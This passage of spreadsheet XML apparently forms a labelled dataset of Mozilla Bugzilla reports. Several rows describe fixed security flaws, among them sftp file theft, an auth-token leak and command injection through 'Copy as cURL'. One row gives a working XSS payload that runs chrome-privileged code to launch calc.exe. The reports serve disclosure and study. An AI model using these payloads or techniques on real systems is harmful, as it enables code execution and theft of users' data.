          <t>unspecified</t>
        </is>
      </c>
      <c r="L3815" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3815" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3815" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3815" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3815" t="inlineStr">
        <is>
          <t>[adv-main45+][adv-esr38.7+]</t>
        </is>
      </c>
      <c r="Q3815" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3815" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3815" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3815" t="n">
        <v>1</v>
      </c>
      <c r="U3815" t="n">
        <v>0</v>
      </c>
      <c r="V3815" t="n">
        <v>5</v>
      </c>
      <c r="W3815" t="inlineStr">
        <is>
          <t>Created attachment 8720398
call_stack.txt
This was found while fuzzing graphite2 latest revision (df41ce06dda5962b9ff1c8c3175af00005d5fc0f)</t>
        </is>
      </c>
      <c r="X3815" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3816">
      <c r="A3816" t="n">
        <v>1530709</v>
      </c>
      <c r="B3816" t="inlineStr">
        <is>
          <t>2019-02-26 08:01:12 -0800</t>
        </is>
      </c>
      <c r="C3816" t="inlineStr">
        <is>
          <t>Use CSSOM to insert rules in SelectParentHelper.</t>
        </is>
      </c>
      <c r="D3816" t="inlineStr">
        <is>
          <t>2024-02-06 13:14:28 -0800</t>
        </is>
      </c>
      <c r="E3816" t="n">
        <v>1</v>
      </c>
      <c r="F3816" t="n">
        <v>1</v>
      </c>
      <c r="G3816" t="n">
        <v>3</v>
      </c>
      <c r="H3816" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3816" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3816" t="inlineStr">
        <is>
          <t>Layout: Form Controls</t>
        </is>
      </c>
      <c r="K3816" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3816" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3816" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3816" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3816" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3816" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main70+]</t>
        </is>
      </c>
      <c r="Q3816" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R3816" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3816" t="inlineStr">
        <is>
          <t>mozilla71</t>
        </is>
      </c>
      <c r="T3816" t="n">
        <v>1</v>
      </c>
      <c r="U3816" t="n">
        <v>0</v>
      </c>
      <c r="V3816" t="n">
        <v>17</v>
      </c>
      <c r="W3816" t="inlineStr">
        <is>
          <t>It would avoid CSS surprises in IPC messages from a potentially compromised content process.</t>
        </is>
      </c>
      <c r="X3816" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3817">
      <c r="A3817" t="n">
        <v>1120984</v>
      </c>
      <c r="B3817" t="inlineStr">
        <is>
          <t>2015-01-13 07:49:00 -0800</t>
        </is>
      </c>
      <c r="C3817" t="inlineStr">
        <is>
          <t>"make bootstrap" should not "python setup.py install" if this is dev</t>
        </is>
      </c>
      <c r="D3817" t="inlineStr">
        <is>
          <t>2015-01-16 14:01:56 -0800</t>
        </is>
      </c>
      <c r="E3817" t="n">
        <v>1</v>
      </c>
      <c r="F3817" t="n">
        <v>1</v>
      </c>
      <c r="G3817" t="n">
        <v>4</v>
      </c>
      <c r="H3817" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3817" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J3817" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3817" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3817" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3817" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3817" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3817" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3817" t="inlineStr"/>
      <c r="Q3817" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3817" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3817" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3817" t="n">
        <v>1</v>
      </c>
      <c r="U3817" t="n">
        <v>0</v>
      </c>
      <c r="V3817" t="n">
        <v>2</v>
      </c>
      <c r="W3817" t="inlineStr">
        <is>
          <t>Dev environments want to do "python setup.py develop". Selena suggests making bootstrap.sh take a flag to decide which of these to do.</t>
        </is>
      </c>
      <c r="X3817" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3818">
      <c r="A3818" t="n">
        <v>1245791</v>
      </c>
      <c r="B3818" t="inlineStr">
        <is>
          <t>2016-02-04 02:46:57 -0800</t>
        </is>
      </c>
      <c r="C3818" t="inlineStr">
        <is>
          <t>Firefox AuthToken in broadcast protected with signature-level permission can be accessed by an application installed beforehand that defines the same permissions</t>
        </is>
      </c>
      <c r="D3818" t="inlineStr">
        <is>
          <t>2024-05-30 09:09:05 -0700</t>
        </is>
      </c>
      <c r="E3818" t="n">
        <v>1</v>
      </c>
      <c r="F3818" t="n">
        <v>1</v>
      </c>
      <c r="G3818" t="n">
        <v>6</v>
      </c>
      <c r="H3818" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3818" t="inlineStr">
        <is>
          <t>Firefox for Android Graveyard</t>
        </is>
      </c>
      <c r="J3818" t="inlineStr">
        <is>
          <t>Firefox Accounts</t>
        </is>
      </c>
      <c r="K3818" t="inlineStr">
        <is>
          <t>47 Branch</t>
        </is>
      </c>
      <c r="L3818" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3818" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3818" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3818" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3818" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main50+]</t>
        </is>
      </c>
      <c r="Q3818" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3818" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3818" t="inlineStr">
        <is>
          <t>Firefox 50</t>
        </is>
      </c>
      <c r="T3818" t="n">
        <v>1</v>
      </c>
      <c r="U3818" t="n">
        <v>0</v>
      </c>
      <c r="V3818" t="n">
        <v>17</v>
      </c>
      <c r="W3818" t="inlineStr">
        <is>
          <t>Created attachment 8715745
poc-authtoken.apk
User Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.97 Safari/537.36
Steps to reproduce:
1. Launch an emulator (or device) whose API level is 19( or lower)
2. Install attached poc app (poc-authtoken.apk) with adb
3. Install firefox for android (fennec) with adb
4. Launch firefox and sync firefox account
5. Remove firefox account (from setting app)
Actual results:
The poc app can receive a broadcast that is sent when firefox account is removed.
Because the broadcast has AuthToken data, the poc app can read Authtoken.
Expected results:
The broadcast cannot be read from app whose signature is different from Mozilla's one.
Or the broadcast will change so that it does not have authtoken.</t>
        </is>
      </c>
      <c r="X3818" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3819">
      <c r="A3819" t="n">
        <v>1350460</v>
      </c>
      <c r="B3819" t="inlineStr">
        <is>
          <t>2017-03-24 15:39:01 -0700</t>
        </is>
      </c>
      <c r="C3819" t="inlineStr">
        <is>
          <t>Non-null-terminated strings in crashreporter_win.cpp may potentially disclose memory</t>
        </is>
      </c>
      <c r="D3819" t="inlineStr">
        <is>
          <t>2018-02-01 16:45:38 -0800</t>
        </is>
      </c>
      <c r="E3819" t="n">
        <v>1</v>
      </c>
      <c r="F3819" t="n">
        <v>1</v>
      </c>
      <c r="G3819" t="n">
        <v>3</v>
      </c>
      <c r="H3819" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3819" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J3819" t="inlineStr">
        <is>
          <t>Crash Reporting</t>
        </is>
      </c>
      <c r="K3819" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3819" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3819" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3819" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3819" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3819" t="inlineStr">
        <is>
          <t>[adv-main55+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q3819" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3819" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3819" t="inlineStr">
        <is>
          <t>mozilla55</t>
        </is>
      </c>
      <c r="T3819" t="n">
        <v>1</v>
      </c>
      <c r="U3819" t="n">
        <v>0</v>
      </c>
      <c r="V3819" t="n">
        <v>19</v>
      </c>
      <c r="W3819" t="inlineStr">
        <is>
          <t>In toolkit\crashreporter\client\crashreporter_win.cpp, function GetStringValue, a Windows registry value is queried. If the type is REG_SZ (i.e. a string), it copies the content of a wchar_t stack buffer to a wstring object, which is returned to the caller.
However, in Microsoft's document [1], it warns us:
&gt; If the data has the REG_SZ, REG_MULTI_SZ or REG_EXPAND_SZ type,
&gt; the string may not have been stored with the proper terminating
&gt; null characters. Therefore, even if the function returns ERROR_SUCCESS,
&gt; the application should ensure that the string is properly terminated
&gt; before using it; otherwise, it may overwrite a buffer.
In our case, because we don't prefill the |buf| with all-zero, suppose the data we read is not null-terminated, then the wstring will contain the stack memory data (which may include old eip value), until it reaches a NULL.
Whether this issue is exploitable depends on how the caller uses the wstring object and what registry value it queries. But no matter what, not ensuring the string is null-terminated is problematic.
The doc suggests to use RegGetValue function.
[1] https://msdn.microsoft.com/en-us/library/windows/desktop/ms724911(v=vs.85).aspx</t>
        </is>
      </c>
      <c r="X3819" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3820">
      <c r="A3820" t="n">
        <v>1036515</v>
      </c>
      <c r="B3820" t="inlineStr">
        <is>
          <t>2014-07-09 10:25:32 -0700</t>
        </is>
      </c>
      <c r="C3820" t="inlineStr">
        <is>
          <t>Refcounting on nsTimerImpl is not actually threadsafe</t>
        </is>
      </c>
      <c r="D3820" t="inlineStr">
        <is>
          <t>2017-01-27 17:22:06 -0800</t>
        </is>
      </c>
      <c r="E3820" t="n">
        <v>1</v>
      </c>
      <c r="F3820" t="n">
        <v>1</v>
      </c>
      <c r="G3820" t="n">
        <v>3</v>
      </c>
      <c r="H3820" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3820" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3820" t="inlineStr">
        <is>
          <t>XPCOM</t>
        </is>
      </c>
      <c r="K3820" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3820" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3820" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3820" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3820" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3820" t="inlineStr">
        <is>
          <t>[adv-main37+][adv-esr31.6+][b2g-adv-main2.2+]</t>
        </is>
      </c>
      <c r="Q3820" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3820" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3820" t="inlineStr">
        <is>
          <t>mozilla38</t>
        </is>
      </c>
      <c r="T3820" t="n">
        <v>1</v>
      </c>
      <c r="U3820" t="n">
        <v>0</v>
      </c>
      <c r="V3820" t="n">
        <v>36</v>
      </c>
      <c r="W3820" t="inlineStr">
        <is>
          <t>While the refcounting on nsTimerImpl is declared threadsafe, we override Release in a way that completely negates any threadsafety protection:
http://dxr.mozilla.org/mozilla-central/source/xpcom/threads/nsTimerImpl.cpp#218
If two threads call Release at the same time, it is possible that one thread will destroy the nsTimerImpl before the other thread returns from Release, leading to a UAF. (Credit to jwwang for spotting this)</t>
        </is>
      </c>
      <c r="X3820" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3821">
      <c r="A3821" t="n">
        <v>1410078</v>
      </c>
      <c r="B3821" t="inlineStr">
        <is>
          <t>2017-10-19 06:46:12 -0700</t>
        </is>
      </c>
      <c r="C3821" t="inlineStr">
        <is>
          <t>The Highlights section does not update</t>
        </is>
      </c>
      <c r="D3821" t="inlineStr">
        <is>
          <t>2017-10-25 08:07:28 -0700</t>
        </is>
      </c>
      <c r="E3821" t="n">
        <v>1</v>
      </c>
      <c r="F3821" t="n">
        <v>1</v>
      </c>
      <c r="G3821" t="n">
        <v>2</v>
      </c>
      <c r="H3821" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3821" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J3821" t="inlineStr">
        <is>
          <t>Browser</t>
        </is>
      </c>
      <c r="K3821" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3821" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M3821" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N3821" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3821" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3821" t="inlineStr">
        <is>
          <t>[NewTab]</t>
        </is>
      </c>
      <c r="Q3821" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3821" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3821" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3821" t="n">
        <v>1</v>
      </c>
      <c r="U3821" t="n">
        <v>0</v>
      </c>
      <c r="V3821" t="n">
        <v>3</v>
      </c>
      <c r="W3821" t="inlineStr">
        <is>
          <t>The highlights section does not seem to update often. Bryan is reporting that he has had the same highlights for weeks. 
The issue is probably related to the caching that we changed. We now fetch the highlights every 15 mins. But if you use the app for less than 15 mins you never actually invalidate highlights. 
saving the last cache invalidated time in the user prefs or always invalidating on launch should work.</t>
        </is>
      </c>
      <c r="X3821" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3822">
      <c r="A3822" t="n">
        <v>800363</v>
      </c>
      <c r="B3822" t="inlineStr">
        <is>
          <t>2012-10-11 07:27:00 -0700</t>
        </is>
      </c>
      <c r="C3822" t="inlineStr">
        <is>
          <t>XSS in Web Developer Toolbar's chrome privilege page</t>
        </is>
      </c>
      <c r="D3822" t="inlineStr">
        <is>
          <t>2024-05-30 07:33:51 -0700</t>
        </is>
      </c>
      <c r="E3822" t="n">
        <v>1</v>
      </c>
      <c r="F3822" t="n">
        <v>1</v>
      </c>
      <c r="G3822" t="n">
        <v>3</v>
      </c>
      <c r="H3822" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3822" t="inlineStr">
        <is>
          <t>DevTools</t>
        </is>
      </c>
      <c r="J3822" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3822" t="inlineStr">
        <is>
          <t>16 Branch</t>
        </is>
      </c>
      <c r="L3822" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3822" t="inlineStr">
        <is>
          <t>Windows Vista</t>
        </is>
      </c>
      <c r="N3822" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3822" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3822" t="inlineStr">
        <is>
          <t>[adv-track-main17+]</t>
        </is>
      </c>
      <c r="Q3822" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3822" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3822" t="inlineStr">
        <is>
          <t>Firefox 19</t>
        </is>
      </c>
      <c r="T3822" t="n">
        <v>1</v>
      </c>
      <c r="U3822" t="n">
        <v>0</v>
      </c>
      <c r="V3822" t="n">
        <v>52</v>
      </c>
      <c r="W3822" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 6.0; rv:16.0) Gecko/20100101 Firefox/16.0
Build ID: 20121005155445
Steps to reproduce:
1. Open Developer Toolbar(Shift+F2).
2. Copy and paste &lt;img	src="x"	onerror="alert(1)"&gt; to toolbar input box.(Whitepaces are Tab chars)
3. You can see "1" from chrome:// URI. This means JavaScript is run as chrome privilege.
The following code runs calc.exe on Windows.
&lt;img	src="x"	onerror="file=Components.classes['@mozilla.org/file/local;1'].createInstance(Components.interfaces.nsILocalFile);file.initWithPath('C:\\\\windows\\\\system32\\\\calc.exe');process=Components.classes['@mozilla.org/process/util;1'].createInstance(Components.interfaces.nsIProcess);process.init(file);process.run(false,'','');"&gt;
Expected results:
JavaScript should not be run.</t>
        </is>
      </c>
      <c r="X3822" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3823">
      <c r="A3823" t="n">
        <v>1737252</v>
      </c>
      <c r="B3823" t="inlineStr">
        <is>
          <t>2021-10-22 03:30:23 -0700</t>
        </is>
      </c>
      <c r="C3823" t="inlineStr">
        <is>
          <t>Escape issue in "Copy as cURL" enables execution of arbitrary commands on users computer</t>
        </is>
      </c>
      <c r="D3823" t="inlineStr">
        <is>
          <t>2024-05-30 10:50:03 -0700</t>
        </is>
      </c>
      <c r="E3823" t="n">
        <v>1</v>
      </c>
      <c r="F3823" t="n">
        <v>1</v>
      </c>
      <c r="G3823" t="n">
        <v>3</v>
      </c>
      <c r="H3823" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3823" t="inlineStr">
        <is>
          <t>DevTools</t>
        </is>
      </c>
      <c r="J3823" t="inlineStr">
        <is>
          <t>Netmonitor</t>
        </is>
      </c>
      <c r="K3823" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3823" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3823" t="inlineStr">
        <is>
          <t>Windows</t>
        </is>
      </c>
      <c r="N3823" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3823" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3823" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form][post-critsmash-triage][adv-main96+][adv-ESR91.5+]</t>
        </is>
      </c>
      <c r="Q3823" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3823" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S3823" t="inlineStr">
        <is>
          <t>96 Branch</t>
        </is>
      </c>
      <c r="T3823" t="n">
        <v>1</v>
      </c>
      <c r="U3823" t="n">
        <v>0</v>
      </c>
      <c r="V3823" t="n">
        <v>15</v>
      </c>
      <c r="W3823" t="inlineStr">
        <is>
          <t>Created attachment 9247249
POC.html
# Description
The constructed *curl* command from the "Copy as cURL" feature in devtools isn't properly escaped for the platform *WINNT*. This means that a malicious website can make network requests that, if the user copies and tries to run them in PowerShell, will enable the website to run arbitrary commands on the users computer.
# Steps to reproduce
This proof of concept includes three variants, each one work independently, and there should be many more combinations that should produce information leakage and arbitrary code execution.
1. Start the browser and open devtools. Then visit the attached file *POC.html*.
2. Select the "Network" tab in devtools and right click on the *POST* request and click "Copy as cURL (Windows)" under "Copy".
3. Paste the command in PowerShell and execute it.
4. Now three things should happen; the remote server should have your environment variable *PATH*, the shell should (among other things) show "Hello World", and the "calc.exe" application should open.
# How and why does it work?
The attack shown above work because it is possible to use the escape character *`* to escape itself and other vital characters. Hence circumventing the escaping preformed by Firefox.
The code responsible for this in Firefox is located in the function at: https://searchfox.org/mozilla-central/source/devtools/client/shared/curl.js#429
# See also
Bug 1518026, Bug 1607742, and Bug 1614468 are old bugs with similar issues.
Please let me know if I can be of any help!</t>
        </is>
      </c>
      <c r="X3823" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3824">
      <c r="A3824" t="n">
        <v>730208</v>
      </c>
      <c r="B3824" t="inlineStr">
        <is>
          <t>2012-02-23 23:14:15 -0800</t>
        </is>
      </c>
      <c r="C3824" t="inlineStr">
        <is>
          <t>Hunt down black -&gt; gray edges in the JS heap</t>
        </is>
      </c>
      <c r="D3824" t="inlineStr">
        <is>
          <t>2012-10-21 22:17:34 -0700</t>
        </is>
      </c>
      <c r="E3824" t="n">
        <v>1</v>
      </c>
      <c r="F3824" t="n">
        <v>1</v>
      </c>
      <c r="G3824" t="n">
        <v>3</v>
      </c>
      <c r="H3824" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3824" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3824" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3824" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3824" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3824" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3824" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3824" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3824" t="inlineStr">
        <is>
          <t>[sg:moderate][advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q3824" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3824" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3824" t="inlineStr">
        <is>
          <t>mozilla15</t>
        </is>
      </c>
      <c r="T3824" t="n">
        <v>1</v>
      </c>
      <c r="U3824" t="n">
        <v>0</v>
      </c>
      <c r="V3824" t="n">
        <v>74</v>
      </c>
      <c r="W3824" t="inlineStr">
        <is>
          <t>billm, was there a bug for this? I can't remember one, so I'm making one to attach my current WIP.</t>
        </is>
      </c>
      <c r="X3824" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3825">
      <c r="A3825" t="n">
        <v>381146</v>
      </c>
      <c r="B3825" t="inlineStr">
        <is>
          <t>2007-05-18 02:57:15 -0700</t>
        </is>
      </c>
      <c r="C3825" t="inlineStr">
        <is>
          <t>[FIX]sftp protocol allows file stealing under certain circumstances</t>
        </is>
      </c>
      <c r="D3825" t="inlineStr">
        <is>
          <t>2009-05-20 16:55:53 -0700</t>
        </is>
      </c>
      <c r="E3825" t="n">
        <v>1</v>
      </c>
      <c r="F3825" t="n">
        <v>1</v>
      </c>
      <c r="G3825" t="n">
        <v>3</v>
      </c>
      <c r="H3825" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3825" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3825" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K3825" t="inlineStr">
        <is>
          <t>1.8 Branch</t>
        </is>
      </c>
      <c r="L3825" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3825" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3825" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3825" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3825" t="inlineStr">
        <is>
          <t>[sg:investigate] not on trunk</t>
        </is>
      </c>
      <c r="Q3825" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3825" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S3825" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3825" t="n">
        <v>1</v>
      </c>
      <c r="U3825" t="n">
        <v>0</v>
      </c>
      <c r="V3825" t="n">
        <v>45</v>
      </c>
      <c r="W3825" t="inlineStr">
        <is>
          <t>Created attachment 265238
sftp-main.html
sftp protocol allows file stealing under certain circumstances
SARVER is a ssh server with sftp and key auth enabled.
luser is a (privileged user) that may connect to SARVER via sftp/ssh via
key auth (~/.ssh/id_(r,d)sa empty passphrase and has SARVER in
~/.known_hosts)
basically via sftp SARVER looks like a web server- note
that the luser's private key gives him access to his private files -
$HOME.
attacker places sftp1.html on SARVER so that it is readadble by luser.
URIs look like:
[1] sftp://SARVER/tmp/sftp1.html
[2] sftp://SARVER/home/luser/.bash_history
[1] may read [2] via javascript.
[1] may be loaded in iframe via anywhere
in addition if luser's ssh settings do not strict host checking, sftp uris
will send his user name and public key to ssh servers - this is similar to
cookies, though such dumbness doesn't seem common.</t>
        </is>
      </c>
      <c r="X3825" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3826">
      <c r="A3826" t="n">
        <v>1026022</v>
      </c>
      <c r="B3826" t="inlineStr">
        <is>
          <t>2014-06-16 10:24:00 -0700</t>
        </is>
      </c>
      <c r="C3826" t="inlineStr">
        <is>
          <t>###!!! ASSERTION: Not a UTF-8 string. This code should only be used for converting from known UTF-8 strings.: 'Error', file dist/include/nsUTF8Utils.h, line 427</t>
        </is>
      </c>
      <c r="D3826" t="inlineStr">
        <is>
          <t>2017-02-10 19:06:46 -0800</t>
        </is>
      </c>
      <c r="E3826" t="n">
        <v>1</v>
      </c>
      <c r="F3826" t="n">
        <v>1</v>
      </c>
      <c r="G3826" t="n">
        <v>3</v>
      </c>
      <c r="H3826" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3826" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3826" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K3826" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3826" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3826" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3826" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3826" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3826" t="inlineStr">
        <is>
          <t>[adv-main31+]</t>
        </is>
      </c>
      <c r="Q3826" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3826" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3826" t="inlineStr">
        <is>
          <t>mozilla33</t>
        </is>
      </c>
      <c r="T3826" t="n">
        <v>1</v>
      </c>
      <c r="U3826" t="n">
        <v>0</v>
      </c>
      <c r="V3826" t="n">
        <v>39</v>
      </c>
      <c r="W3826" t="inlineStr">
        <is>
          <t>The attached certificate causes the following failure (mozilla-central c482c28b35b6 + patches from bug 1015973):
Running test with PKIX
[3539] WARNING: NS_ENSURE_TRUE(IsUTF8(input)) failed: file netwerk/dns/nsIDNService.cpp, line 293
[3539] ###!!! ASSERTION: Not a UTF-8 string. This code should only be used for converting from known UTF-8 strings.: 'Error', file ../../../dist/include/nsUTF8Utils.h, line 427
[3539] ###!!! ASSERTION: Not a UTF-8 string. This code should only be used for converting from known UTF-8 strings.: 'Error', file ../../../dist/include/nsUTF8Utils.h, line 427
Hit MOZ_CRASH() at memory/mozalloc/mozalloc_abort.cpp:30
ASAN:SIGSEGV
=================================================================
==3539==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7f0b9f2a373a sp 0x7fff7c0f56e0 bp 0x7fff7c0f56f0 T0)
    #0 0x7f0b9f2a3739 in mozalloc_abort(char const*) memory/mozalloc/mozalloc_abort.cpp:30
    #1 0x7f0b92641cad in Abort(char const*) xpcom/base/nsDebugImpl.cpp:472
    #2 0x7f0b9264197a in NS_DebugBreak xpcom/base/nsDebugImpl.cpp:459
    #3 0x7f0b9263ff9f in CalculateUTF8Length::write(char const*, unsigned int) dist/include/nsUTF8Utils.h:427
    #4 0x7f0b92623eba in nsCharSinkTraits&lt;CalculateUTF8Length&gt;::write(CalculateUTF8Length&amp;, char const*, unsigned int) dist/include/nsCharTraits.h:572
    #5 0x7f0b92623eba in CalculateUTF8Length&amp; copy_string&lt;nsReadingIterator&lt;char&gt;, CalculateUTF8Length&gt;(nsReadingIterator&lt;char&gt; const&amp;, nsReadingIterator&lt;char&gt; const&amp;, CalculateUTF8Length&amp;) dist/include/nsAlgorithm.h:70
